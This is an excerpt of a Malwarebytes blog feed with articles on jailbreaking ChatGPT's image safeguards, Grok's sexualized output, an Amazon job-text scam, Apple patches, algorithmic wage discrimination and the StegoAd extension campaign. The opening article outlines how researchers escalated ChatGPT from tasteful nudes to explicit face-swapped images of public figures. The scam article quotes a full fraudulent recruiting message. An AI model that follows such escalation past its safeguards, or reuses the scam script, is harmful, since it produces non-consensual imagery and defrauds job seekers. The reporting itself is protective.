<p class="wp-block-paragraph">OpenAI&#8217;s safety documentation <a href="https://deploymentsafety.openai.com/chatgpt-images-2-0/safety-and-policy-evaluations" target="_blank" rel="noreferrer noopener nofollow">describes</a> text classifiers that are supposed to block harmful image generation requests before they begin. There&#8217;s also a downstream reasoning model that evaluates generated output before it&#8217;s shown to the user. None of it stopped Mindgard&#8217;s modified viral prompt, though.</p>



<p class="wp-block-paragraph">This instance of prompt manipulation is pretty extreme, but it isn&#8217;t the only one.</p>



<p class="wp-block-paragraph">In February, Mindgard posted about a separate technique it used to convince ChatGPT that it was OK to generate tasteful nudes. From there, it took a few short steps to making the nudes, shall we say, less tasteful. And then it managed to face-swap public figures onto those images.</p>



<p class="wp-block-paragraph">When OpenAI responded to that prompting hack to say that it had fixed the problem, Mindgard tweaked the same prompt and continued to be able to produce concerning output.</p>



<h2 id="h-the-race-no-one-wants-to-be-first-to-lose" class="wp-block-heading"><a>The race no one wants to be first to lose</a></h2>



<p class="wp-block-paragraph">OpenAI isn&#8217;t the worst offender here. xAI&#8217;s Grok holds that spot, <a href="https://www.malwarebytes.com/blog/news/2026/02/grok-continues-producing-sexualized-images-after-promised-fixes">producing sexualized imagery</a> in response to 45 of 55 relevant prompts. A follow-up round five days later still yielded sexualized images in 29 of 43 prompts even when reporters said the subjects had not consented. Non-profit AI Forensics also gathered 50,000 tweets prompting Grok for image generation, and 20,000 images. It found 53% contained explicit imagery, 81% of which were of women and 2% of children under 18. It has <a href="https://aiforensics.org/uploads/Grok_Unleashed_Updated.pdf" target="_blank" rel="noreferrer noopener nofollow">flagged</a> material from Grok to French regulators for potential child sex abuse material (CSAM) identification under the Digital Services Act.</p>



<p class="wp-block-paragraph">The problem is worse than any single platform. According to a <a href="https://cdn.governance.ai/Assessing_Risk_Relative_to_Competitors_An_Analysis_of_Current_AI_Company_Policies.pdf" target="_blank" rel="noreferrer noopener nofollow">policy study</a> from the nonprofit Centre for the Governance of AI, some AI companies have provisions in their safety frameworks that let them soften safeguards in line with their competitors. That could lead to a cascading effect where multiple companies relax their policies, it said.</p>



<h2 id="h-what-this-means-for-users" class="wp-block-heading"><a>What this means for users</a></h2>



<p class="wp-block-paragraph">Treat the safety guarantees on commercial image-generation tools as marketing copy with footnotes. They may try in good faith to stop bad actors from manipulating their systems, but this is, and always has been, a game of cat and mouse. The classifiers work for most casual users most of the time, but they might not stop anyone determined enough.</p>



<p class="wp-block-paragraph">If your face is online, assume it can be used for something you&#8217;d rather it wasn&#8217;t. If you discover non-consensual imagery of yourself, use platform takedown channels and report to specialist bodies: the National Center for Missing and Exploited Children&#8217;s <a href="https://takeitdown.ncmec.org/" target="_blank" rel="noreferrer noopener nofollow">Takeitdown</a> service in the US, or the the <a href="https://www.iwf.org.uk/">Internet Watch Foundation</a> in the UK.</p>



<hr class="wp-block-separator has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide" style="margin-top:var(--wp--preset--spacing--20);margin-bottom:var(--wp--preset--spacing--20)" />



<div class="wp-block-columns is-layout-flex wp-container-core-columns-is-layout-2a4782fa wp-block-columns-is-layout-flex" style="margin-top:var(--wp--preset--spacing--50);margin-bottom:var(--wp--preset--spacing--50)">
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow" style="flex-basis:85%">
<p class="wp-block-paragraph"><strong>What do cybercriminals know about you?</strong></p>



<p class="wp-block-paragraph"> Use Malwarebytes’ free <strong>Digital Footprint scan </strong>to see whether your personal information has been exposed online.</p>



<div class="wp-block-malware-bytes-button mb-button" id="mb-button-9fb76ce6-e9be-4800-a515-474eb985c2be"><div class="mb-button__row u-justify-content-flex-start"><div class="mb-button__item mb-button-item-0"><p class="btn-main"><a href="https://www.malwarebytes.com/digital-footprint" target="_blank" rel="noreferrer noopener">SCAN NOW</a></p></div></div></div>
</div>
</div>



<p class="wp-block-paragraph"></p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/ai/2026/07/chatgpt-produced-graphic-violent-images-that-shocked-researchers</link>
			<pubDate>Wed, 01 Jul 2026 09:10:01 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/ai/2026/07/chatgpt-produced-graphic-violent-images-that-shocked-researchers</guid>
		</item>
				<item>
			<title><![CDATA[ Watch out for &#8220;high paying, low effort&#8221; Amazon job texts ]]></title>
			<description><![CDATA[ Scammers are using Amazon and the promise of big money to lure people in to their trap. ]]></description>
								<category>Scams</category>
										<category>Threat Intel</category>
										<category><![CDATA[ amazon ]]></category>
										<category><![CDATA[ low-effort remote opening ]]></category>
										<category><![CDATA[ recruiting ]]></category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">Remote, flexible, high‑paying work is a tempting prospect, and the holy grail for many people looking for a new role. But it&#8217;s not just recruiters who are aware of this,  <a href="https://www.malwarebytes.com/blog/news/2024/12/task-scams-surge-by-400-but-what-are-they">job scammers</a> do too and are happy to use it as an easy lure.</p>



<p class="wp-block-paragraph">That lure tends to be even more tempting when they claim to be recruiting for a household name like Amazon. The fraudsters use SMS, WhatsApp, Telegram, and email-to-text gateways to blast out offers that look personalized but are actually mass‑produced scripts tweaked with different names, job titles, and reference numbers.</p>



<p class="wp-block-paragraph">In recent months, one script has shown up again and again: A supposed recruiter called Sophia from Amazon’s recruiting department, promising $250–$500 a day for just 60–90 minutes of simple work. It’s a textbook example of a &#8220;task scam&#8221; or &#8220;gamified job scam,&#8221; where victims are slowly pushed toward paying “deposits” or handing over sensitive personal data.</p>



<p class="wp-block-paragraph">Here is the exact wording of one such message, sent from a Hotmail address and asking the victim to text a US number for more information:</p>



<figure class="wp-block-image aligncenter size-large"><img loading="lazy" height="1024" width="473" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/06/IMG_5287.png?w=473" alt="example of job scam offer by Sophia from Amazon" class="wp-image-431193" /><figcaption class="wp-element-caption">example of job scam offer by Sophia from Amazon</figcaption></figure>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">“Hello, this is Sophia from Amazon&#8217;s Recruiting Department. Staff ID: AMZ-7677</p>



<p class="wp-block-paragraph">We’ve reviewed your background and believe you’re perfect for our high-paying, low-effort remote opening. This role is incredibly straightforward, focusing on helping sellers optimize product listings to enhance their online presence.</p>



<ul class="wp-block-list">
<li>Ultra-flexible schedule: Only 60–90 minutes a day, 4 days per week</li>



<li>Compensation: $250–$500 per day (Base pay of $1000 for every 4 days worked)</li>



<li>Extra Perks: Comprehensive guidance provided + 15–20 days of paid annual leave</li>
</ul>



<p class="wp-block-paragraph">We are filling 20 spots immediately. If you are at least 25 years old and want to earn extra income easily, please text 16172930958 for further details.</p>



<p class="wp-block-paragraph">Ref-46499”</p>
</blockquote>



<p class="wp-block-paragraph">Variations of this &#8220;Sophia from Amazon&#8221; script have been reported to the <a href="https://www.bbb.org/scamtracker/lookupscam/1211487?returnTo=%2Fscamtracker%2Flookupscam%3Fq%3Dall%253D%2522job%2Bopportunity%2522%2526from%253D0" target="_blank" rel="noreferrer noopener nofollow">Better Business Bureau</a>, posted on <a href="https://www.instagram.com/p/DZZvGAKDB-3/" target="_blank" rel="noreferrer noopener nofollow">social media</a> as scam warnings, and <a href="https://www.reddit.com/r/jobs/comments/1u6iqwo/what_an_insane_job_offer/" target="_blank" rel="noreferrer noopener nofollow">shared in discussion threads</a> after users realized the Amazon job offer was fake. The details change slightly sometimes: We’ve seen “Grace from Amazon” and other minor changes, but the structure and unrealistic promises remain the same.</p>



<h2 id="h-red-flags" class="wp-block-heading">Red flags</h2>



<p class="wp-block-paragraph">With the help of <a href="https://www.malwarebytes.com/solutions/scam-guard">Malwarebytes Scam Guard</a> we noticed these red flags:</p>



<ul class="wp-block-list">
<li><strong>Non‑Amazon contact details. </strong>The message comes from a Hotmail address and directs you to text a standalone number, not to apply via the official Amazon Jobs site. <a href="https://amazon.jobs/content/en/how-we-hire/fraud-alert-india" target="_blank" rel="noreferrer noopener nofollow">Amazon’s own fraud alert</a> says it does not recruit via generic webmail accounts and does not send official hiring communications from non‑Amazon domains.</li>



<li><strong>Unsolicited job offer out of the blue. </strong>The <a href="https://consumer.ftc.gov/consumer-alerts/2024/11/random-text-offering-you-job-its-probably-scam" target="_blank" rel="noreferrer noopener nofollow">FTC specifically warns</a> that random texts offering you a job at a well‑known company, even if they claim to have reviewed your background, are classic job scams designed to steal money or identity, not real recruitment.</li>



<li><strong>Too much money for too little work. </strong>Promising $250–$500 per day for 60–90 minutes of &#8220;low‑effort&#8221; remote work is exactly the sort of disproportionate pay that indicates something might be a job scam. In many &#8220;task scams,&#8221; criminals advertise simple actions like liking videos, optimizing apps, or boosting product listings for outsized rewards. The too good to be true principle applies here.</li>



<li><strong>A vague, feel‑good job description. </strong>“Helping sellers optimize product listings to enhance their online presence” sounds plausible but tells you nothing about tools, targets, metrics, or reporting lines, which are all thing you’d expect in a legitimate Amazon job posting. <a href="https://www.malwarebytes.com/blog/news/2025/03/i-spoke-to-a-task-scammer-heres-how-it-went">Task scam scripts</a> often rely on generic buzzwords like &#8220;optimization,&#8221; &#8220;promotion,&#8221; or &#8220;boosting&#8221; to sound professional without committing to anything real.</li>



<li><strong>Urgency and scarcity pressure. </strong>The claim that Amazon is &#8220;filling 20 spots immediately&#8221; is there to stop you from thinking too long about it, a very popular tactic among all scammers. Legitimate Amazon recruitment may set application windows, but it does not pressure strangers via text to grab a limited number of mystery roles.</li>



<li><strong>Off‑channel communication and likely pivot to WhatsApp/Telegram.</strong><br>Reports of similar Amazon‑themed job scams show that after the first reply, scammers usually move the victim to WhatsApp, Telegram, or a browser‑based &#8220;work portal&#8221; controlled by the criminals. Once there, &#8220;Sophia from Amazon&#8221; (or whatever name is used) can build rapport and walk victims through increasingly risky steps.</li>
</ul>



<h2 id="h-the-risks-are-real-though" class="wp-block-heading">The risks are real though</h2>



<p class="wp-block-paragraph">Even if you spot some of the issues, it’s tempting to think you can &#8220;just see what they say.&#8221; With scams like these, there are several ways engagement can escalate badly.</p>



<ul class="wp-block-list">
<li><strong>Upfront payments and task‑platform losses. </strong>In many task scams, victims are told to complete small tasks and they’ll see small profits in an online wallet. But soon they’re asked to deposit their own money to unlock higher‑paying levels. The platform, which may claim to be connected to Amazon’s seller tools, then blocks withdrawals or vanishes once enough victims have deposited funds.</li>



<li><strong>Identity theft and account takeover. </strong>The fake recruiter may ask for sensitive personal details for onboarding purposes: full name, address, date of birth, ID scans, bank details, or even selfies with an ID card. This data can be abused directly or resold, allowing criminals to open accounts, apply for loans, or bypass identity checks elsewhere.</li>



<li><strong>Money mule or parcel mule involvement. </strong>Some fake jobs tied to brands like Amazon turn out to be <a href="https://www.malwarebytes.com/blog/scams/2026/06/beware-of-parcel-expert-job-offers-theyre-parcel-mule-scams">reshipping or parcel mule scams</a>, which are roles that involve receiving packages and forwarding them, often purchased with stolen cards. Others are payment mule schemes where the “employee” receives funds into their own bank account or crypto wallet and then forwards the money on. In both cases, you can end up laundering stolen goods or funds, with potential legal consequences.</li>



<li><strong>Malware or phishing links masquerading as Amazon tools. </strong>A scammer impersonating Amazon recruiters might send links to fake login pages, supposed &#8220;Amazon optimization dashboards,&#8221; or APK files claiming to be Amazon tools. These can steal your Amazon credentials or install malware, putting not only your Amazon account at risk but also other accounts that reuse the same password.</li>



<li><strong>Psychological pressure and sunk‑cost manipulation. </strong>Once you’ve invested time, shared some data, or sent a small payment, scammers exploit the feeling of not wanting to cut your losses and pressure you to send &#8220;just one more&#8221; deposit to release your wages or avoid losing your progress. Victims in task scam cases have reported losing thousands of dollars as they kept trying to finish one last task set to unlock everything they were owed.</li>
</ul>



<h2 id="h-how-to-stay-safe" class="wp-block-heading">How to stay safe</h2>



<p class="wp-block-paragraph">If someone who says they&#8217;re from Amazon—or another company—suddenly offers you a remarkably easy job via text, treat it as a warning sign, not an opportunity. Always verify directly with the company itself, rely on trusted job platforms, and resist the urge to just see what happens when a stranger promises big money for almost no work.</p>



<p class="wp-block-paragraph">Once you know the red flags, it is easier to stay safe from task scams.</p>



<ul class="wp-block-list">
<li>Do not respond to unsolicited job offers via text messages or messaging apps</li>



<li>Never pay to get paid</li>



<li>Verify the legitimacy of the employer through official channels</li>



<li>Don’t trust anyone who offers to pay you for something <a href="https://www.ftc.gov/news-events/news/press-releases/2024/08/federal-trade-commission-announces-final-rule-banning-fake-reviews-testimonials" target="_blank" rel="noreferrer noopener nofollow">illegal such as rating or liking things</a> online</li>
</ul>



<p class="wp-block-paragraph">It’s also important to keep in mind that legitimate employers do not ask employees to pay for the opportunity to work. And as with most scams, if it sound to good to be true, it probably is. If you run into a task scam, please report it to the FTC at <a href="http://www.reportfraud.ftc.gov/" target="_blank" rel="noreferrer noopener nofollow">ReportFraud</a><a href="http://www.reportfraud.ftc.gov/" target="_blank" rel="noreferrer noopener">.</a><a href="https://reportfraud.ftc.gov/" target="_blank" rel="noreferrer noopener">ftc.gov</a>. </p>



<hr class="wp-block-separator has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide" />



<h3 class="wp-block-heading" id="h-something-feel-off-check-it-before-you-click-nbsp-nbsp"><strong>Something feel off? Check it before you click.&nbsp;</strong>&nbsp;</h3>



<p class="wp-block-paragraph"><strong>Malwarebytes Scam Guard</strong>&nbsp;helps you&nbsp;analyze&nbsp;suspicious links, texts, and screenshots instantly.&nbsp;&nbsp;</p>



<p class="wp-block-paragraph">Available with&nbsp;<a href="https://www.malwarebytes.com/premium" target="_blank" rel="noreferrer noopener">Malwarebytes Premium Security</a>&nbsp;for all your devices, and in the&nbsp;<a href="https://www.malwarebytes.com/mobile" target="_blank" rel="noreferrer noopener">Malwarebytes app for iOS and Android</a>.&nbsp;&nbsp;</p>



<p class="wp-block-paragraph"><a href="https://www.malwarebytes.com/solutions/scam-guard" target="_blank" rel="noreferrer noopener">Try it free →</a>&nbsp;</p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/scams/2026/06/watch-out-for-high-paying-low-effort-amazon-job-texts</link>
			<pubDate>Tue, 30 Jun 2026 20:46:28 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/scams/2026/06/watch-out-for-high-paying-low-effort-amazon-job-texts</guid>
		</item>
				<item>
			<title><![CDATA[ Update time: Apple releases security patches for iOS, MacOS Tahoe, Safari ]]></title>
			<description><![CDATA[ A new Apple update fixes a multitude of browser and browser related vulnerabilities which have been public knowledge for a while ]]></description>
								<category>Bugs</category>
										<category>News</category>
										<category><![CDATA[ Apple ]]></category>
										<category><![CDATA[ beta tested ]]></category>
										<category><![CDATA[ WebKit ]]></category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">Apple has <a href="https://support.apple.com/en-us/127594" target="_blank" rel="noreferrer noopener nofollow">released</a> security updates for more than two dozen security vulnerabilities across iPhone, iPad, and Mac.</p>



<p class="wp-block-paragraph">The updates for iOS/iPadOS, MacOS Tahoe, and Safari were issued after testing on iOS 26.6 and iPadOS 26.6 betas.</p>



<p class="wp-block-paragraph">What stands out in the update is that a lot of the vulnerabilities were found in WebKit, the browser engine that powers Safari as well as every browser on iPhone, including Chrome, Firefox, and Edge. It also looks like several of the issues Apple has addressed can be chained together to steal data or run malicious code with little or no user interaction.</p>



<h2 id="h-updates-for-your-particular-device" class="wp-block-heading">Updates for your particular device</h2>



<p class="wp-block-paragraph">The table below shows which updates are available and points you to the relevant security content for that subject.</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td><strong>Name&nbsp;and link</strong></td><td><strong>Available for</strong></td></tr><tr><td><a href="https://support.apple.com/en-us/127594" target="_blank" rel="noreferrer noopener nofollow">iOS 26.5.2 and iPadOS 26.5.2</a></td><td>iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later</td></tr><tr><td><a href="https://support.apple.com/en-us/127595" target="_blank" rel="noreferrer noopener nofollow">macOS Tahoe 26.5.2</a></td><td>macOS Tahoe</td></tr><tr><td><a href="https://support.apple.com/en-us/127685" target="_blank" rel="noreferrer noopener nofollow">Safari 26.5.2</a></td><td>macOS Sonoma and macOS Sequoia</td></tr></tbody></table></figure>



<h2 id="h-how-to-update-your-apple-devices" class="wp-block-heading"><strong>How to update your Apple devices</strong></h2>



<h3 id="h-how-to-update-your-iphone-or-ipad" class="wp-block-heading">How to update your iPhone or iPad</h3>



<p class="wp-block-paragraph">For iOS and iPadOS users, here’s how to check if you’re using the latest software version:</p>



<p class="wp-block-paragraph">Go to&nbsp;<strong>Settings</strong>&nbsp;&gt;&nbsp;<strong>General</strong>&nbsp;&gt;&nbsp;<strong>Software Update</strong>. You will see if there are updates available and be guided through installing them.</p>



<p class="wp-block-paragraph">Turn on&nbsp;<strong>Automatic Updates</strong>&nbsp;if you haven’t already—you’ll find it on the same screen.</p>



<figure class="wp-block-image size-full"><img loading="lazy" width="945" height="646" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/06/26-5-2_update.png" alt="update" class="wp-image-431246" /></figure>



<h3 id="h-how-to-update-macos-on-any-version" class="wp-block-heading">How to update macOS on any version</h3>



<p class="wp-block-paragraph">To update macOS on any supported Mac, use the Software Update feature, which Apple designed to work consistently across all recent versions. Here are the steps:</p>



<ul class="wp-block-list">
<li>Click the Apple menu in the upper-left corner of your screen.</li>



<li>Choose&nbsp;<strong>System Settings</strong>&nbsp;(or&nbsp;<strong>System Preferences</strong>&nbsp;on older versions).</li>



<li>Select&nbsp;<strong>General</strong>&nbsp;in the sidebar, then click&nbsp;<strong>Software Update</strong>&nbsp;on the right. On older macOS, just look for&nbsp;<strong>Software Update</strong>&nbsp;directly.</li>



<li>Your Mac will check for updates automatically. If updates are available, click&nbsp;<strong>Update Now</strong>&nbsp;(or&nbsp;<strong>Upgrade Now</strong>&nbsp;for major new versions) and follow the on-screen instructions. Before you upgrade to macOS Tahoe 26, please read these&nbsp;<a href="https://support.apple.com/en-us/122727" target="_blank" rel="noreferrer noopener">instructions</a>.</li>



<li>Enter your administrator password if prompted, then let your Mac finish the update (it might need to restart during this process).</li>



<li>Make sure your Mac stays plugged in and connected to the internet until the update is done.</li>
</ul>



<h3 id="h-how-to-update-your-safari-browser" class="wp-block-heading">How to update your Safari browser</h3>



<p class="wp-block-paragraph">Safari updates are included with macOS updates, so installing the latest version of macOS will also update Safari. To check manually:</p>



<ul class="wp-block-list">
<li>Open the&nbsp;Apple menu<strong>&nbsp;</strong><strong>&gt;</strong><strong>&nbsp;</strong><strong>System Settings</strong><strong>&nbsp;</strong><strong>&gt;</strong><strong>&nbsp;</strong><strong>General&nbsp;&gt;</strong><strong>&nbsp;</strong><strong>Software Update</strong>.</li>



<li>If you see a Safari update listed separately, click&nbsp;<strong>Update Now</strong>&nbsp;to install it.</li>



<li>Restart your device when prompted.</li>
</ul>



<p class="wp-block-paragraph">If you’re on an older macOS version that’s still supported (like Sonoma or Sequoia), Apple may offer Safari updates independently through Software Update.</p>



<h2 id="h-technical-details" class="wp-block-heading">Technical details</h2>



<p class="wp-block-paragraph">On iPhone and iPad, every browser—Safari, Chrome, Firefox, Edge—is forced to use Apple’s WebKit engine, which is exactly where most of the 26.5.2 fixes land. Apple and independent write‑ups describe a chain of WebKit issues, including use‑after‑free bugs, memory corruption, and cross‑origin logic errors that could be triggered simply by loading a malicious page. In several cases, the impact ranges from crashing your browser to corrupting memory or leaking data from other sites you have open in different tabs.</p>



<p class="wp-block-paragraph">And there are some other browser related issues. Apple also notes fixes in Web Extensions and permission handling that could have allowed browser extensions or sites to access more data than intended. Plus some that are scattered across related libraries and frameworks such as libxslt, and WebRTC.</p>



<p class="wp-block-paragraph">Libxslt is an open-source C library used to perform transformations on XML documents. It enables developers to convert raw XML data into other formats, such as HTML, plain text, or other XML structures.</p>



<p class="wp-block-paragraph">WebRTC (Web Real-Time Communication) is an open-source technology that allows web browsers and mobile apps to communicate directly with each other.</p>



<p class="wp-block-paragraph">None of the patched vulnerabilities are known to be exploited in the wild, but that doesn’t mean you can relax. One thing to consider when you are scheduling this update is that, due to the beta testing, the details of these vulnerabilities have been public knowledge for a while, so the race to come up with an exploit has already started.</p>



<hr class="wp-block-separator alignfull has-alpha-channel-opacity is-style-wide" />



<p class="wp-block-paragraph"><strong>Scammers know more about you than you think.</strong>&nbsp;</p>



<p class="wp-block-paragraph">Malwarebytes Mobile Security protects you from phishing,&nbsp;scam&nbsp;texts, malicious sites, and more. With real-time AI-powered Scam Guard built right in.&nbsp;</p>



<p class="wp-block-paragraph"><a href="https://www.malwarebytes.com/ios" target="_blank" rel="noreferrer noopener">Download for iOS →</a>&nbsp;<a href="https://www.malwarebytes.com/android" target="_blank" rel="noreferrer noopener">Download for Android →</a>&nbsp;</p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/news/2026/06/update-time-apple-releases-security-patches-for-ios-macos-tahoe-safari</link>
			<pubDate>Tue, 30 Jun 2026 14:35:45 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/news/2026/06/update-time-apple-releases-security-patches-for-ios-macos-tahoe-safari</guid>
		</item>
				<item>
			<title><![CDATA[ This pay gap is programmed (Lock and Code S07E13) ]]></title>
			<description><![CDATA[ This week on the Lock and Code podcast, we speak with Veena Dubal about algorithmic wage discrimination and its appetite for all worker data.  ]]></description>
								<category>Podcast</category>
										<category><![CDATA[ algorithmic wage discrimination ]]></category>
										<category><![CDATA[ monitoring ]]></category>
										<category><![CDATA[ surveillance ]]></category>
										<category><![CDATA[ wage ]]></category>
										<category><![CDATA[ worker monitoring ]]></category>
										<category><![CDATA[ worker surveillance ]]></category>
										<category><![CDATA[ workplace monitoring ]]></category>
										<category><![CDATA[ workplace surveillance ]]></category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">This week on the Lock and Code podcast&#8230;</p>



<p class="wp-block-paragraph">Pay is personal for plenty of Americans, but a new distribution model that consumes vast quantities of worker data is turning pay into something else: personalized. </p>



<p class="wp-block-paragraph">For an increasing number of workers in America, the money they can expect to be paid on any given day, week, or month is unknown to them. They could work the same number of hours as they did the shift before. They could help the same number of customers. They could do everything, as nearly similar as possible, and still be paid less than another worker in the exact same position, or even themselves just last week.</p>



<p class="wp-block-paragraph">The mechanism behind this pay disparity is called algorithmic wage discrimination and while the term may be new, it&#8217;s inner workings could sound quite familiar. </p>



<p class="wp-block-paragraph">Algorithmic wage discrimination describes the zig-zag pay that is meted out to contract workers by big companies like Uber and Amazon. Whereas many workers in the world rely on salaries, or commissions, or self-determined contract rates,  workers at Uber are different. </p>



<p class="wp-block-paragraph">In the same way that Uber decides what you pay for a ride to the airport, Uber also decides what a driver makes. And the calculus behind that decision is opaque. Location, traffic, the time of day, and the number of drivers on the road all play some role, but not a complete one. And in the same way that Uber incentivizes you with a flash sale or a price so high that you maybe walk a couple blocks in a different direction to get a lower price, Uber incentivizes drivers with bonuses and challenges, keeping them on the road perhaps longer than they intended.</p>



<p class="wp-block-paragraph">The end result, then, isn’t just unpredictable pay—it’s potentially an attempt to predict and control behavior.</p>



<p class="wp-block-paragraph">For her 2023 paper, titled “<a href="https://papers.ssrn.com/sol3/papers.cfm?abstract_id=4331080" target="_blank" rel="noreferrer noopener nofollow">On Algorithmic Wage Discrimination</a>,” professor of law Veena Dubal spoke with many Uber drives who compared this system to “casino culture,” in that the pay is unpredictable but the potential for a jackpot—or, just a good payment on one ride—is enough to convince drivers to stick around, night after night, hour after hour.</p>



<p class="wp-block-paragraph">As one driver told Dubal:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">“It’s like gambling! The house always wins.”</p>
</blockquote>



<p class="wp-block-paragraph">Today, on the Lock and Code podcast with host David Ruiz, we speak with Dubal—professor of law at the UC Irvine School of Law—about how algorithmic wage discrimination works, what data it consumes to function, and the threat it poses as it creeps from gig work into many more industries.</p>



<p class="wp-block-paragraph">Tune in today to listen to the full conversation.</p>



<figure class="wp-block-embed is-type-rich is-provider-spotify wp-block-embed-spotify wp-embed-aspect-21-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<p class="wp-block-paragraph"><em>Show notes and credits:</em></p>



<p class="wp-block-paragraph">Intro Music: “Spellbound” by Kevin MacLeod (<a href="http://incompetech.com/" target="_blank" rel="noreferrer noopener">incompetech.com</a>)<br>Licensed under Creative Commons: By Attribution 4.0 License<br><a href="http://creativecommons.org/licenses/by/4.0/" target="_blank" rel="noreferrer noopener">http://creativecommons.org/licenses/by/4.0/</a><br>Outro Music: “Good God” by Wowa (unminus.com)</p>



<hr class="wp-block-separator has-alpha-channel-opacity" />



<p class="wp-block-paragraph"><strong>Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.</strong></p>



<p class="wp-block-paragraph">Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our&nbsp;<a href="https://try.malwarebytes.com/lockandcode/">exclusive offer for Malwarebytes Premium Security for Lock and Code listeners</a>.</p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/podcast/2026/06/this-pay-gap-is-programmed-lock-and-code-s07e13</link>
			<pubDate>Mon, 29 Jun 2026 14:44:37 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/podcast/2026/06/this-pay-gap-is-programmed-lock-and-code-s07e13</guid>
		</item>
				<item>
			<title><![CDATA[ 119 Edge extensions promised useful tools, instead downloaded malware ]]></title>
			<description><![CDATA[ Microsoft has removed over 100 Edge extensions that were delivering malware hidden in images. ]]></description>
								<category>News</category>
										<category><![CDATA[ Edge ]]></category>
										<category><![CDATA[ StegoAd ]]></category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">Microsoft has removed 119 extensions from the Edge add-on store which were all tied to one adware campaign.</p>



<p class="wp-block-paragraph">In a paper titled &#8220;<a href="https://microsoftedge.github.io/edgevr/assets/files/stego_ad/Microsoft_Edge_Security_StegoAd.pdf" target="_blank" rel="noreferrer noopener nofollow">Inside StegoAd: How We Disrupted a Massive Malicious Extension Campaign</a>,&#8221; Microsoft researchers detail how they uncovered and dismantled a sophisticated malware campaign that abused browser extensions to infect users. According to Microsoft, the campaign involved 119 malicious browser extensions which were downloaded by 2.6 million users.</p>



<p class="wp-block-paragraph">The extensions all promised, and delivered, some kind of basic functionality: ad blockers, VPNs, translators, video downloaders, calculators, coupon extensions and so on. But after a while they turned out to be “<a href="https://www.malwarebytes.com/blog/news/2025/12/sleeper-browser-extensions-woke-up-as-spyware-on-4-million-devices">sleepers</a>” and secretly started downloading additional malware.</p>



<p class="wp-block-paragraph">Among the payload was malware involved in <a href="https://www.malwarebytes.com/blog/threats/ad-fraud">ad fraud</a>, but also extensions that ran arbitrary JavaScript pushed from the server, which stole Google credentials and second-factor codes at sign-in, harvested WordPress admin logins, and exfiltrated cookies in bulk for session hijacking.</p>



<p class="wp-block-paragraph">The name of the campaign “StegoAd” is derived from the words advertising and <a href="https://www.malwarebytes.com/blog/news/2022/08/explained-steganography">steganography</a>, which means techniques of hiding secrets in something that doesn’t immediately cause suspicion. In this case, hiding code in images.</p>



<p class="wp-block-paragraph">And not only did the cybercriminals try to stay under the radar by waiting for some time, and hiding malicious code inside images, they also left some victims alone. Some of the extensions only went rogue in about 10% of installs, which would actually execute the next stage of the malware, while the other ~90% would be left alone (at least for that execution attempt). And, in some cases, they re-used names of well-known legitimate extensions to install an additional level of trust.</p>



<p class="wp-block-paragraph">Browser extensions are a source of wealth for cybercriminals because it compares to installing a small program that lives inside your browser, which can see and report about everything you do on the internet.</p>



<p class="wp-block-paragraph">Now I hear some of you thinking: I don’t use Edge. Or I&#8217;ve used it just once, to download and install my favorite browser. But although Microsoft discovered and analyzed the campaign, the techniques used in this campaign are applicable to Chromium-based browsers in general.</p>



<p class="wp-block-paragraph">This campaign was less about exploiting a browser vulnerability and more about tricking users into installing a trusted-looking extension, then using sophisticated concealment techniques to avoid detection long enough to compromise systems.</p>



<h2 id="h-how-to-stay-safe" class="wp-block-heading">How to stay safe</h2>



<p class="wp-block-paragraph">Always be careful when downloading extensions, even from the reputable app stores. As we&#8217;ve seen many times before, criminals manage to get their apps or extensions listed when they are only one update away from turning into malware. So, make sure that you trust the developer and don’t rely on reviews alone.</p>



<p class="wp-block-paragraph">Use an up-to-date <a href="https://www.malwarebytes.com/">real-time security solution</a> to detect and remove malicious extensions from your device and block connections to malicious domains and IP addresses.  Remove the known malicious extensions from your browser. Below is an alphabetical list of the malicious extensions the researchers found by name.</p>



<p class="wp-block-paragraph">Please note that there might be more than one extension that has the same name. In case you doubt whether the extension you have installed is among them, check whether the ID matches the one shown in the list. If you prefer looking them up by ID, you can find them organized differently in the <a href="https://microsoftedge.github.io/edgevr/assets/files/stego_ad/Microsoft_Edge_Security_StegoAd.pdf">Microsoft report</a> (pages 40-43).</p>



